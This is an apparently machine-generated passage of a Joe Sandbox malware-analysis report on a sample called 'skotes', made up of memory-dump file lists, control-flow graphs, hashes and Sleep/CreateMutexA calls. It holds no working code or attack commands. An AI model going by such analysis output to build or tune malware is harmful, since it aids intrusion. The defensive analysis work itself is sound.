                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797543996.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797563899.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797591340.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797614702.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797634362.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797656115.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797691125.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797717114.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797801740.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797840131.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797864975.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797886304.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797909176.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797934254.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798011058.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798031229.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798053092.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798076382.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798101812.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798122885.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798147218.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798166267.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: f3410d9e8c2c3422c9e21b18b8b4214508f4cc07fd32d70f9b4cf9751f1c3a5b
                                                                                                                                                                                                                                                  • Instruction ID: c4c7734ad9c9eb1c9cd1e2b1933ea20dd17c3eaa4072f90db59ff92b4e81086e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3410d9e8c2c3422c9e21b18b8b4214508f4cc07fd32d70f9b4cf9751f1c3a5b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3210431704240DBEF289BACEC89B6DB7A2EBC2310F24471DE418D76D5DBB9D9809752
                                                                                                                                                                                                                                                  Function 0009A856 Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 306 9a856-9a86e 307 9a89c-9a89e 306->307 308 9a870-9a87c 306->308 309 9a8a9-9a8b1 call 97d30 307->309 310 9a8a0-9a8a7 307->310 311 9a87e-9a88c 308->311 312 9a892-9a899 call ad663 308->312 322 9a8b3-9a8bb call 97d30 309->322 323 9a8e4-9a8e6 309->323 313 9a8eb-9a916 call a80c0 310->313 311->312 315 9a94e-9a987 call c6c6a Sleep CreateMutexA 311->315 312->307 327 9a98e-9a994 315->327 322->323 328 9a8bd-9a8c5 call 97d30 322->328 323->313 329 9a9a7-9a9a8 327->329 330 9a996-9a998 327->330 328->323 335 9a8c7-9a8cf call 97d30 328->335 330->329 332 9a99a-9a9a5 330->332 332->329 335->323 338 9a8d1-9a8d9 call 97d30 335->338 338->323 341 9a8db-9a8e2 338->341 341->313
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1796827623.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796755859.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796827623.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796920266.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796979923.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797011577.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797109293.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797129613.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797152074.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797167103.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797227965.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797250428.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797274904.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797289779.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797313862.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797336491.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797360786.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797382902.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797401968.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797420486.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797442450.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797461001.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797479757.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797498202.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797520647.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797543996.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797563899.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797591340.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797614702.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797634362.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797656115.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797691125.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797717114.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797801740.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797840131.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797864975.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797886304.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797909176.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797934254.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798011058.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798031229.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798053092.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798076382.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798101812.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798122885.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798147218.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798166267.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 9248bf45de6c02db1ad57b0ca023bd4bb091a38fb2f74090657122bfd3456c86
                                                                                                                                                                                                                                                  • Instruction ID: 511e2407ceeaed00db5fe5a788cb617f8c3f8aa36510ce5e7e84777688b443a8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9248bf45de6c02db1ad57b0ca023bd4bb091a38fb2f74090657122bfd3456c86
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5213031355200DAFF68676C888AB7EB2919F83304F344916E10CD62D2CE79C581B2D3
                                                                                                                                                                                                                                                  Function 0009A34F Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 283 9a34f-9a35b 284 9a35d-9a36b 283->284 285 9a371-9a39a call ad663 283->285 284->285 286 9a93a 284->286 291 9a3c8-9a916 call a80c0 285->291 292 9a39c-9a3a8 285->292 288 9a953-9a994 Sleep CreateMutexA 286->288 289 9a93a call c6c6a 286->289 299 9a9a7-9a9a8 288->299 300 9a996-9a998 288->300 289->288 294 9a3aa-9a3b8 292->294 295 9a3be-9a3c5 call ad663 292->295 294->286 294->295 295->291 300->299 303 9a99a-9a9a5 300->303 303->299
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1796827623.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796755859.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796827623.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796920266.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796979923.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797011577.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797109293.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797129613.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797152074.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797167103.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797227965.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797250428.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797274904.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797289779.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797313862.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797336491.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797360786.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797382902.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797401968.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797420486.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797442450.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797461001.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797479757.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797498202.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797520647.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797543996.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797563899.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797591340.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797614702.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797634362.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797656115.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797691125.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797717114.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797801740.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797840131.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797864975.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797886304.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797909176.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797934254.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798011058.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798031229.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798053092.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798076382.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798101812.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798122885.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798147218.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798166267.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 310eaf790f73ba49c9555697b76172a9497d546d535bb27a6436b8034a2eaa36
                                                                                                                                                                                                                                                  • Instruction ID: 4a310c21fdfb74c5c722a449c200dcd2621d8d00d325f0d7cf57917ef0ec4cb3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 310eaf790f73ba49c9555697b76172a9497d546d535bb27a6436b8034a2eaa36
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 902137317442009BEF189BACDC89B7CB7A2EB83320F24861DE408D76D1CB76D6809392

                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                  Function 000CCBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1796827623.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796755859.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796827623.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796920266.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796979923.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797011577.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797109293.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797129613.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797152074.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797167103.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797227965.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797250428.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797274904.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797289779.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797313862.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797336491.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797360786.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797382902.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797401968.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797420486.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797442450.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797461001.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797479757.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797498202.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797520647.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797543996.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797563899.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797591340.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797614702.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797634362.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797656115.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797691125.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797717114.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797801740.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797840131.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797864975.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797886304.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797909176.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797934254.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798011058.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798031229.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798053092.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798076382.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798101812.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798122885.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798147218.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798166267.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
